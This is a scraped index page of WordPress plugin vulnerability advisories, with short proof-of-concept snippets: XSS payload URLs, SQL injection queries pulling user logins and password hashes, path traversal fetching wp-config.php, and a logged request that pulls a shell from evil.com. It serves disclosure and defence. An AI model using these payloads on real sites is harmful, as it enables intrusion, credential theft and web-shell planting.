Lucene search
K
WpexploitMost viewed

4359 matches found

wpexploit
wpexploit
added 2015/10/19 12:0 a.m.13 views

Recent Posts Widget Extended <= 0.9.9.3 - Authenticated XSS (multisite)

XSS in the Recent Posts Widget Extended plugin allows single site admins to change network admin's password with simple CSRF described above POC field. This vulnerability is currently unpatched. 1. Login as single site administrator 2. Add Recent Posts Extended Widget to some widget area 3. Add...

0.3AI score
Exploits0References2
wpexploit
wpexploit
added 2015/08/21 12:0 a.m.13 views

SEO Redirection < 2.9 - Authenticated Reflected Cross-Site Scripting (XSS)

The plugin was affected by an Authenticated Reflected Cross-Site Scripting XSS security vulnerability in its settings page, via the search GET parameter https://example.com/wp-admin/options-general.php?page=seo-redirection.php&tab=posts&search=%22+onmouseover%3Dalert%281%29+%3E...

1.4AI score
Exploits0References2
wpexploit
wpexploit
added 2015/08/02 12:0 a.m.13 views

recent-backups <= 0.7 - Remote File Download

Plugin is still affected and has been closed. The code in download-file.php does not verify if the user is logged in or sanitize which files can be downloaded. This vulnerability can be used to download sensitive system files, such as the Linux passwd file. $ curl -v...

5CVSS1.4AI score0.03854EPSS
Exploits1References3
wpexploit
wpexploit
added 2015/07/27 12:0 a.m.13 views

Hide My WP <= 4.51.1 - Stored Cross-Site Scripting (XSS)

An attacker can make a fake attack attempt, with a JavaScripting payload, which will be logged by the plugin, resulting in XSS. The attacker also can spoof their IP address in the logs by setting the X-FORWARDED-FOR header. curl --referer ' // :; ;' --header 'X-FORWARDED-FOR: 8.8.8.8'...

0.1AI score
Exploits0References1
wpexploit
wpexploit
added 2015/06/30 12:0 a.m.13 views

WP-CopyProtect <= 3.0.0 - CSRF & Stored Cross-Site Scripting (XSS)

The WP-CopyProtect Protect your blog posts plugin for WordPress is vulnerable to a Persistent XSS attack on the settings screen, due to a lack of sanitation of user input, and lack of Cross-Site Request Forgery CSRF token nonce. alert1'/ document.getElementById"form".submit;...

0.7AI score
Exploits0References1
wpexploit
wpexploit
added 2015/05/15 12:0 a.m.13 views

Anti-Malware & Brute-Force Security by ELI <= 4.15.17 - Multiple Reflected XSS

The Anti-Malware Security and Brute-Force Firewall WordPress plugin was affected by a Multiple Reflected XSS security vulnerability. http://localhost/wordpress/wp-admin/admin.php?page=GOTMLS-settings&GOTMLSmsg=xsstestalert1...

0.8AI score
Exploits0References1
wpexploit
wpexploit
added 2015/05/06 12:0 a.m.13 views

Freshmail for WordPress <= 1.5.8 - Unauthenticated SQL Injection

There is a unauthenticated SQL injection vulnerability in the "Subscribe to our newsletter" formularies showed to the web visitors in the POST parameter fmformid. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: X-Requested-With: XMLHttpRequest ... Cookie: wordpressf30...

Exploits0References2
wpexploit
wpexploit
added 2015/04/23 12:0 a.m.13 views

Ultimate Product Catalogue <= 3.1.2 - Unauthenticated SQL Injection

Unauthenticated SQL injection in ajax call when the plugin is counting the times a product is being seen by the web visitors. The vulnerable POST parameter is "ItemID". Vulnerable code: In file Functions/ProcessAjax.php line 67: ... $ItemID = $POST'ItemID'; $Item = $wpdb-getrow"SELECT ItemViews...

2.2AI score
Exploits0References1
wpexploit
wpexploit
added 2015/04/16 12:0 a.m.13 views

WP-Mon - Arbitrary File Download

The wp-mon WordPress plugin was affected by an Arbitrary File Download security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php...

1.4AI score
Exploits0References1
wpexploit
wpexploit
added 2014/09/29 12:0 a.m.13 views

Category Page Icons <= 0.9.1 - Arbitrary File Upload/Deletion via Path Traversal

v0.9.2 added a check to not allow direct access to the affected file. However the path traversal was not fixed Plugin has been closed from repository. Choose File to upload : Directory :...

7.2AI score
Exploits0References1
wpexploit
wpexploit
added 2012/06/01 12:0 a.m.13 views

Gallery 3.06 - Unauthenticated File Upload PHP Code Execution

The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability. The vulnerable file was: http://www.example.com/wp-content/plugins/gallery-plugin/upload/php.php...

1.4AI score
Exploits0References1
wpexploit
wpexploit
added 2022/02/23 12:0 a.m.12 views

15Zine < 3.3.0 - Reflected Cross-Site Scripting

Description The theme does not sanitise and escape the cbi parameter before outputing it back in the response via the cbsa AJAX action, leading to a Reflected Cross-Site Scripting https://example.com/wp-admin/admin-ajax.php?action=cbsa&cbi=alert/XSS/;...

6.1CVSS6.1AI score0.02602EPSS
Exploits2
wpexploit
wpexploit
added 2020/04/18 12:0 a.m.12 views

Rank Math 0.9~1.0.42.1 - Missing Access Controls to Disable Competitor Plugins

Missing access controls on the GET requests to deactivate competitors' plugins. This could allow any authenticated users such as subscribers to deactivate the SEO and Sitemap plugins from competitors. The attack could also be performed via CSRF...

5.2AI score
Exploits0References1
wpexploit
wpexploit
added 2020/02/16 12:0 a.m.12 views

ThemeGrill Demo Importer < 1.6.3 - Auth Bypass & Database Wipe

There is a vulnerability that allows any unauthenticated user to wipe the entire database to its default state after which they are automatically logged in as an administrator. Edit WPScanTeam: v1.6.2 was released with an insufficient fix, allowing attackers to still exploit the issue using a CSR...

1.5AI score
Exploits0References2
wpexploit
wpexploit
added 2019/12/24 12:0 a.m.12 views

Featured Image from URL <= 2.7.7 - Missing Access Controls on REST routes

The REST routes are missing permission callbacks, allowing unauthenticated/unauthorised users to call them. Affected endpoints: - wp-json/featured-image-from-url/v2/enablefakeapi - wp-json/featured-image-from-url/v2/disablefakeapi - wp-json/featured-image-from-url/v2/nonefakeapi -...

0.9AI score
Exploits0References1
wpexploit
wpexploit
added 2019/10/23 12:0 a.m.12 views

Groundhogg <= 2.0.8.1 - Authenticated Reflected XSS

Wordpress Groundhogg plugin with a version lower than 2.0.8.1 is affected by an authenticated Reflected Cross-site scripting XSS vulnerability. Exploit Title: Wordpress Groundhogg /wp-admin/admin.php?page=ghbulkjobs&action=ghexportcontactsalert1 - The response will contain: bulkaction:...

0.2AI score
Exploits0References1
wpexploit
wpexploit
added 2019/09/03 12:0 a.m.12 views

Portrait-Archiv.com Photostore <= 3.1 - Unauthenticated Reflected XSS

The 'pDetails' GET parameter from the js/imageDetails.php was vulnerable to an unauthenticated reflected XSS attack. http://www.example.com/wp-content/plugins/portrait-archiv-shop/js/imageDetails.php?pDetails=;;alert"XSS"...

1.6AI score
Exploits0References2
wpexploit
wpexploit
added 2019/07/10 12:0 a.m.12 views

Hybrid Composer <= 1.4.6 - Unauthenticated Options Update

This plugin has a function to update Wordpress options via Ajax and it's set with the following: addaction'wpajaxnoprivhcajaxsaveoption', 'hcajaxsaveoption'; Which means it does not require authentication and is exploitable by anyone on the internet. I've already spoken to the plugin author about...

2.2AI score
Exploits0References2
wpexploit
wpexploit
added 2019/07/08 12:0 a.m.12 views

WP Slimstat <= 4.8.3 - CSRF to Stored XSS and Setting Updates

Lack of CSRF check and sanitisation in the updatesettings function can lead to settings update, as well as Stored XSS issues /wp-admin/admin.php?page=slimconfig&tab=1" method="POST" ' /...

0.3AI score
Exploits0References1
wpexploit
wpexploit
added 2019/04/30 12:0 a.m.12 views

Share This Image <= 1.19 - Stored XSS

Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered Go to the Share This Image menu, and put " in the Selector field from the "What to Share" secti...

0.4AI score
Exploits0
wpexploit
wpexploit
added 2018/09/28 12:0 a.m.12 views

Breadcrumb NavXT <= 6.1.0 - Username Disclosure via REST API

The Breadcrumb NavXT WordPress plugin was affected by an Username Disclosure via REST API security vulnerability. http://www.example.com/wp-json/bcn/v1/author/1...

1.7AI score
Exploits0References2
wpexploit
wpexploit
added 2017/03/10 12:0 a.m.12 views

Profile Builder < 2.5.8 - Authenticated Stored Cross-Site Scripting (XSS)

Stored Cross-Site Scripting XSS in field minimum password length. history.pushState'', '', '/'...

0.2AI score
Exploits0References1
wpexploit
wpexploit
added 2017/01/04 12:0 a.m.12 views

ByREV WP-PICShield - Cross-Site Request Forgery (CSRF)

The ByREV WP-PICShield WordPress plugin is vulnerable to CSRF. When updating the plugin options, several parameters in the issued POST request are written directly to the .htaccess file within the WordPress root directory. An attacker may be able to insert arbitrary lines into the .htaccess file,...

7.2AI score
Exploits0
wpexploit
wpexploit
added 2016/12/12 12:0 a.m.12 views

WP Private Messages 1.0.1 – Authenticated SQL Injection

Type user access: registered user. $GET‘id’ is not escaped. URL is accessible for every registered user. http://www.example.com/wp-admin/users.php?page=wp-private-messages%2Fwpuprivatemessages.php&wpu=read&id=0+UNION+SELECT+1,2,2,name,slug,6,7,8,9,10,11,12+FROM+wpterms+WHERE++termid%3D1&r=recieve...

1.5AI score
Exploits0References1
wpexploit
wpexploit
added 2016/11/17 12:0 a.m.12 views

Answer My Question 1.3 - SQL Injection

$POST'id' is not escaped. Url is accessible for any user. Url vulnerable : http://target/wp-content/plugins/answer-my-question/modal.php...

0.6AI score
Exploits0References2
wpexploit
wpexploit
added 2016/11/12 12:0 a.m.12 views

BBS e-Franchise 1.1.1 - Unauthenticated SQL Injection

$GET‘uid’ is not escaped, the URL is accessible for any user. You will have find a post or page that uses the plugin's shortcode...

1AI score
Exploits0References2
wpexploit
wpexploit
added 2016/11/10 12:0 a.m.12 views

FireStorm Shopping Cart eCommerce Plugin 2.07.02 - Authenticated SQL Injection

$POST ‘pid’ is not escaped. Url is accessible for administrator user. Url with problem: http://localhost:1406/wp/wp-admin/admin.php?page=fssc-products=general=edit=0=0 http://target/wp-admin/admin.php?page=fssc-products&fp=general&f=edit&cid=0&pid=0+UNION+SELECT+name+FROM+wpterms+WHERE+termid=1...

6.5CVSS0.4AI score0.01918EPSS
Exploits2References1
wpexploit
wpexploit
added 2016/09/30 12:0 a.m.12 views

Appointment Calendar - Stored Cross-Site Scripting (XSS)

When user submist data from appointments there is no validation which leads to stored XSS. curl 'Path to page where appointments calendar short-code is used' -H 'Accept: text/html, /; q=0.01' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.5' -H 'Content-Type:...

0.2AI score
Exploits0References1
wpexploit
wpexploit
added 2016/07/03 12:0 a.m.12 views

Real3D FlipBook <= 2.8 - Multiple Vulnerabilities

List of vulnerabilities: - Delete any file or directory from the server Unauthenticated - Upload images in Root directory Unauthenticated - Cross-Site Scripting XSS + POCExploit CodeCanyon Real3D FlipBook WordPress Plugin + http://codecanyon.net/item/real3d-flipbook-wordpress-plugin/6942587 +...

0.3AI score
Exploits0References3
wpexploit
wpexploit
added 2016/06/09 12:0 a.m.12 views

CM Ad Changer <= 1.7.7 - Stored Cross-Site Scripting (XSS)

An Stored Cross Site Scripting was reported by the author to CM Ad Plugins under which an unprivileged user can trigger a Stored XSS to perform malicious actions or any attacker could send a crafted link CSRF which can trigger the Stored XSS. 1 Go to CM Ad changers - Campaigns 2 Create a Campaign...

0.2AI score
Exploits0References1
wpexploit
wpexploit
added 2016/04/25 12:0 a.m.12 views

The Events Calendar <= 4.1.1 - Open Redirect

The problem is located in the "tribe-bar-view" parameter that can be used to redirect a user to an arbitrary website. Timeline 2016-04-04 : Initial contact with Modern Tribe 2016-04-05 : Modern Tribe confirms the report 2016-04-07 : Modern Tribe publishes a new version 4.1.1.1 that resolves the...

1.1AI score
Exploits0References1
wpexploit
wpexploit
added 2015/08/20 12:0 a.m.12 views

WP Google Map Plugin < 3.0.0 - CSRF to Authenticated Cross-Site Scripting (XSS)

The lack of CSRF Protection could allow attackers to perform XSS attack against logged in administrators. ' / ' /...

2.1AI score
Exploits0References2
wpexploit
wpexploit
added 2015/07/16 12:0 a.m.12 views

Download Manager <= 2.7.94 - Authenticated Stored XSS

The stored XSS vulnerability allows any authenticated user to inject malicious code via the name of the uploaded file: Example: .jpg The vulnerability exists because the file name is not properly sanitized and this can lead to malicious code injection that will be executed on the target’s browser...

6.4AI score
Exploits0References2
wpexploit
wpexploit
added 2015/06/15 12:0 a.m.12 views

Users to CSV <= 1.4.5 - Cross-Site Request Forgery (CSRF)

The users-to-csv WordPress plugin was affected by a Cross-Site Request Forgery CSRF security vulnerability. http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=users http://www.example.com/wp-admin/users.php?page=users2csv.php&csv=true&table=comments...

3.6AI score
Exploits0References2
wpexploit
wpexploit
added 2014/08/27 12:0 a.m.12 views

WordPress 3.5-3.7.1 - XML-RPC Denial of Service

…...

7.1AI score
Exploits0References3
wpexploit
wpexploit
added 2014/08/24 12:0 a.m.12 views

KenBurner Slider - Unauthenticated Arbitrary File Download

The WordPress Plugin called KenBurner Slider suffers from Arbitrary File Download Vulnerability, which could allow an attacker to download the wp-config.php file and others. This issue has been spotted being exploited in the wild...

6.9AI score
Exploits0References2
wpexploit
wpexploit
added 2014/08/01 12:0 a.m.12 views

BSK PDF Manager < 2.9.1 - Authenticated Stored Cross-Site Scripting (XSS)

The plugin does not sanitise the view and cattitle POST parameter when creating or editing a category /wp-admin/admin.php?page=bsk-pdf-manager, allowing authenticated users with a role as low as editor to set an XSS payload which will be triggered in the Categories list...

0.8AI score
Exploits0References1
wpexploit
wpexploit
added 2020/07/13 12:0 a.m.11 views

Findgo - Directory Listing < 1.3.32 - Unauthenticated Reflected and Authenticated Stored XSS

Multiple Cross-Site Scripting XSS vulnerabilities were discovered in the «Findgo - Directory Listing WordPress Theme», tested version — v1.3.30. PoC Unauthenticated Reflected XSS: https://demoapus.com/findgo/listings/?searchdistance=%22%3E%3Cimg%20src=x%20onerror=alertXSS%3E PoC Authenticated...

Exploits0References2
wpexploit
wpexploit
added 2019/09/18 12:0 a.m.11 views

Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export

The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email. The plugin is still affected and has been closed. curl...

1.9AI score
Exploits0
wpexploit
wpexploit
added 2019/08/04 12:0 a.m.11 views

Rencontre < 3.2 - Authenticated Stored XSS via textmail & textanniv Parameters

An authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in the victim's browser when they visit the web site. Affected Version Version: alert'XSS'// Encoded-Payload:...

Exploits0References1
wpexploit
wpexploit
added 2019/06/28 12:0 a.m.11 views

Watu Quizz <= 3.1.2.5 - Reflected XSS via question-form.html.php

The Watu Quiz WordPress plugin was affected by a Reflected XSS via question-form.html.php security vulnerability. /wp-admin/admin.php?page=watuquestion&question=1&action=edit&quiz=1"...

3.3AI score
Exploits0References1
wpexploit
wpexploit
added 2017/11/02 12:0 a.m.11 views

Like Button Rating < 2.5.4 - Unauthenticated Arbitrary Blog Settings Change

In the init action, this plugin checked to see if $POST'likebtnimportconfig' is empty. If it’s not empty then it base64-decodes the string, parses it as JSON, and starts changing options. This could allow attackers to change blog settings such as the Site Title. The below form will set the “Site...

1.3AI score
Exploits0References2
wpexploit
wpexploit
added 2017/07/06 12:0 a.m.11 views

DSubscribers <= 1.2 - Authenticated SQL Injection

The DSubscribers WordPress plugin was affected by an Authenticated SQL Injection security vulnerability. Proof of Concept: 1 – Login with admin user: 2 – Url attack: http://target/wp-admin/admin.php?page=dsubscribers&action=edit&dsubscribers=0 UNION SELECT 1,2,CONCATuserlogin,char58,userpass FROM...

1.1AI score
Exploits0References1
wpexploit
wpexploit
added 2017/05/31 12:0 a.m.11 views

Tribulant Newsletters <= 4.6.4.2 – Multiple Vulnerabilities

The Newsletters WordPress plugin was affected by security vulnerability. 3.1 File disclosure Vulnerable URL: http://vulnerablesite.com/wp-admin/admin.php?page=newslettershistory&wpmlmethod=exportdownload&file=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWIN DOWS%5cwin.ini 3.2 Cross-Site...

0.6AI score
Exploits0References1
wpexploit
wpexploit
added 2017/05/02 12:0 a.m.11 views

Calendar by WD <= 1.5.51 - Authenticated SQL injection

http://www.defensecode.com/advisories/DC-2017-01-017WordPressSpiderEventCalendarPluginAdvisory.pdf Vulnerable POST URL: http://www.vulnerablesite.com/wpadmin/admin.php?page=SpiderCalendar&task=showmanageevent&calendarid=1 Vulnerable POST Body:...

0.7AI score
Exploits0References2
wpexploit
wpexploit
added 2017/05/02 12:0 a.m.11 views

WordPress Facebook <= 1.0.13 - Authenticated SQL Injection

http://www.defensecode.com/advisories/DC-2017-04-011WordPressFacebookPluginAdvisory.pdf Vulnerable POST URL: http://vulnerablesite.com/wp-admin/admin.php?page=SpiderFacebookmanage Vulnerable POST Body: searcheventsbytitle=&pagenumber=1&serchornot=&ascordesc=1&orderby=type AND SELECT FROM...

0.7AI score
Exploits0References2
wpexploit
wpexploit
added 2016/09/21 12:0 a.m.11 views

W3 Total Cache <= 0.9.4.1 - Authenticated Reflected Cross-Site Scripting (XSS)

The W3 Total Cache WordPress plugin was affected by an Authenticated Reflected Cross-Site Scripting XSS security vulnerability...

0.8AI score
Exploits0References4
wpexploit
wpexploit
added 2016/06/03 12:0 a.m.11 views

WP Mobile Detector <= 3.5 - Arbitrary File Upload

The wp-mobile-detector WordPress plugin was affected by an Arbitrary File Upload security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-mobile-detector/resize.php?src=https://www.evil.com/shell.php...

1.4AI score
Exploits0References3
wpexploit
wpexploit
added 2016/03/23 12:0 a.m.11 views

Anti-Malware Security & Brute-Force Firewall <= 4.15.42 - XSS & CSRF

The Anti-Malware Security and Brute-Force Firewall WordPress plugin was affected by a XSS & CSRF security vulnerability. XSS vulnerability in https://wordpress.org/plugins/gotmls/ has been identified. While I scan a site with that plugin , i had a file '".png and it was skippped , but result was...

0.5AI score
Exploits0References1
wpexploit
wpexploit
added 2016/01/13 12:0 a.m.11 views

Commentator <= 2.5.2 - Reflected Cross-Site Scripting (XSS)

The commentator WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-admin/admin-ajax.php?action=commentatorsocialsignin&provider=facebook"...

1AI score
Exploits0References3
Total number of security vulnerabilities4359